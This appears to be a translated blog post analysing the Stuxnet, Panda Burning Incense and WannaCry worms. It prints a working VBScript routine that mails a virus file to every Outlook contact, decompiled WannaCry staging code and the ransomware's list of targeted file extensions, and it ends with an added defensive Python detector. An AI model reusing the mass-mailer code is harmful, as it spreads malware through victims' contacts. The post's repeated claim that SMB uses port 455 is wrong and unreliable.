Stuxnet worm (MS10-061). Once the worm is written to a machine it registers itself to start automatically, and its driver is installed as an auto-starting service. The driver is responsible for bypassing the system's limit on half-open TCP connections so that the worm can spread faster over the network. It also spreads through removable drives (USB flash drives and the like): an infected system copies itself onto any USB drive that is plugged in. Inside the local area network it spreads through the MS10-061 Print Spooler remote code execution vulnerability, and it also tries a list of weak passwords in an attempt to guess its way onto hosts, endangering the security of the whole network. Finally it plants a backdoor on the computer that keeps trying to connect to the attacker's remote server, collects user information, receives the attacker's instructions, and can fetch a Trojan from that server and execute it, which poses a serious security risk.
I spent a long time on Panda Burning Incense. Although I had the original worm, I did not analyze its key code; I only found some variants online which are said to have been modified about 50 times.
Set objOA = WScript.CreateObject("Outlook.Application")
' Create the Outlook application object
Set objMapi = objOA.GetNameSpace("MAPI")
' Get the MAPI namespace
For i = 1 To objMapi.AddressLists.Count
    ' Walk every address book
    Set objAddList = objMapi.AddressLists(i)
    For j = 1 To objAddList.AddressEntries.Count
        Set objMail = objOA.CreateItem(0)
        objMail.Recipients.Add(objAddList.AddressEntries(j))
        ' Take the recipient's e-mail address from the address book
        objMail.Subject = "Hello!"
        ' Set the subject of the message
        objMail.Body = "The attachment for you this time is my new document!"
        ' Set the body of the message
        objMail.Attachments.Add("c:\virus.vbs")
        ' Spread itself as an attachment
        objMail.Send
        ' Send the mail
    Next
Next
Set objMapi = Nothing
Set objOA = Nothing
This fragment is the spreading routine from the source code: it hijacks the user's mailbox account and automatically sends mail to the user's contacts, and the attachment is simply a copy of the virus. The recent "Bitcoin virus", by comparison, can only spread quickly inside the local area network, through port 455.
Panda Burning Incense is mainly distributed through downloads; it deletes Ghost backup image files and replaces the icon of the infected file, but does not destroy the file's contents.
The Bitcoin virus is different.
The WannaCry Trojan uses the "EternalBlue" exploit tool from the leaked Equation Group toolkit, which targets the MS17-010 vulnerability, to scan the network for port 455. Once a target machine is compromised, it downloads the WannaCry Trojan from the attacking machine and infects itself; it then becomes an attacking machine in turn and scans both the Internet and the other machines on its local network, which is what produced the large-scale, extremely fast worm-like spread.
mssecsvc.exe is the Trojan's mother process (the dropper). Once running, it scans Internet hosts at random IP addresses and tries to infect them, and it also scans the machines in its own LAN segment to spread the infection. In addition, it drops the ransomware component tasksche.exe, which encrypts the files on disk and demands a ransom for them.
/* Decompiled (IDA-style) pseudocode of the payload-staging loop */
v1 = 0;
do
{
    p_payload = &payload_x86;           /* first pass: x86 kernel payload */
    if (v1)
        p_payload = &payload_x64;       /* second pass: x64 kernel payload */
    v3 = *(void **)&filename[4 * v1 + 260];
    *(&v11 + v1) = (int)v3;
    memcpy(v3, p_payload, v1 != 0 ? 51364 : 16480);   /* payload sizes in bytes */
    *(&v11 + v1) += v1 != 0 ? 51364 : 16480;
    ++v1;
}
while (v1 < 2);
v4 = CreateFileA(filename, 0x80000000u, 1u, 0, 3u, 4u, 0);
This is built on MS17-010, so the blame can only fall on those who did not install the patch.
The Trojan encrypts files with AES and uses the asymmetric algorithm RSA-2048 to encrypt the random keys. Each file is encrypted with its own random key, so the odds of recovering a file without it are as follows: just as with the German Enigma cipher machine of World War II, whose daily key settings ran to astronomical numbers, nothing can be decrypted unless the key is obtained.
Panda Burning Incense does not damage documents, but this one does.
.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der
These are all the file suffixes the virus attacks.
Unlike Panda, it communicates with its servers anonymously over Tor, through a local Tor proxy listening on port 9050.
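The two network behaviours attributed to WannaCry above, the mssecsvc.exe sweep across the LAN and random Internet addresses and the traffic through the local Tor proxy on port 9050, are what a defender would look for in endpoint connection telemetry. The following is an added example, not code from the original post: it runs both detections over a constructed connection log. The log format, host and process names, LAN range, thresholds and timestamps are all assumptions made for this example; SMB is matched on TCP 445, the port SMB actually listens on.

```python
# Added example (not from the original post): worm-style SMB fan-out and local
# Tor SOCKS proxy use, detected over a constructed endpoint connection log.
# Log format assumed here: "time host process dst_ip dst_port", one event per line.
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

SMB_PORT = 445                 # SMB over TCP
TOR_SOCKS_PORT = 9050          # default Tor SOCKS proxy port named in the post
FANOUT_THRESHOLD = 20          # distinct SMB targets per window that trigger an alert
WINDOW = timedelta(seconds=60)
LAN = ipaddress.ip_network("10.0.0.0/8")   # assumed internal address range


def constructed_log():
    """Sample telemetry, constructed for this example (not real captures)."""
    lines = []
    # one process sweeps 16 LAN neighbours in 16 seconds ...
    for i in range(16):
        lines.append(f"2017-05-12T10:00:{i:02d} ws01 mssecsvc.exe 10.0.0.{10 + i} 445")
    # ... then 8 Internet addresses (TEST-NET-3 used as stand-ins for random targets)
    for i in range(8):
        lines.append(f"2017-05-12T10:00:{16 + i:02d} ws01 mssecsvc.exe 203.0.113.{1 + i} 445")
    # the dropped component talks to the local Tor SOCKS listener
    lines.append("2017-05-12T10:01:30 ws01 tasksche.exe 127.0.0.1 9050")
    # ordinary file-share use on another workstation: two targets, no alert
    lines.append("2017-05-12T10:00:05 ws02 explorer.exe 10.0.0.2 445")
    lines.append("2017-05-12T10:00:09 ws02 explorer.exe 10.0.0.3 445")
    return lines


def parse(lines):
    """Parse log lines into (timestamp, host, process, dst_ip, dst_port) tuples."""
    events = []
    for line in lines:
        ts, host, proc, dst, port = line.split()
        events.append((datetime.fromisoformat(ts), host, proc,
                       ipaddress.ip_address(dst), int(port)))
    return events


def detect_smb_fanout(events, threshold=FANOUT_THRESHOLD, window=WINDOW):
    """Report each (host, process) whose distinct SMB targets inside some
    `window`-long interval reach `threshold`: the fan-out pattern of a scanning worm,
    as opposed to a user opening a couple of file shares."""
    by_src = defaultdict(list)
    for ts, host, proc, dst, port in events:
        if port == SMB_PORT:
            by_src[(host, proc)].append((ts, dst))
    alerts = []
    for (host, proc), conns in by_src.items():
        conns.sort(key=lambda c: c[0])
        best = set()
        lo = 0
        for hi, (ts, _) in enumerate(conns):
            while ts - conns[lo][0] > window:    # slide the window start forward
                lo += 1
            targets = {d for _, d in conns[lo:hi + 1]}
            if len(targets) > len(best):
                best = targets
        if len(best) >= threshold:
            internal = sum(1 for d in best if d in LAN)
            alerts.append({"host": host, "process": proc,
                           "distinct_targets": len(best),
                           "internal": internal,
                           "external": len(best) - internal})
    return alerts


def detect_tor_proxy_use(events):
    """Report (host, process) pairs that connect to the Tor SOCKS port."""
    return sorted({(host, proc) for _, host, proc, _, port in events
                   if port == TOR_SOCKS_PORT})


if __name__ == "__main__":
    evts = parse(constructed_log())
    for alert in detect_smb_fanout(evts):
        print("SMB fan-out:", alert)
    for host, proc in detect_tor_proxy_use(evts):
        print("Tor SOCKS proxy use:", host, proc)
```

The fan-out rule keys on distinct destinations rather than connection count, so a file server that one client talks to repeatedly never trips it, while a process that touches dozens of neighbours in a minute does; the internal/external split in the alert tells the analyst whether the sweep is confined to the LAN or is also reaching the Internet, which is the behaviour the post describes for mssecsvc.exe.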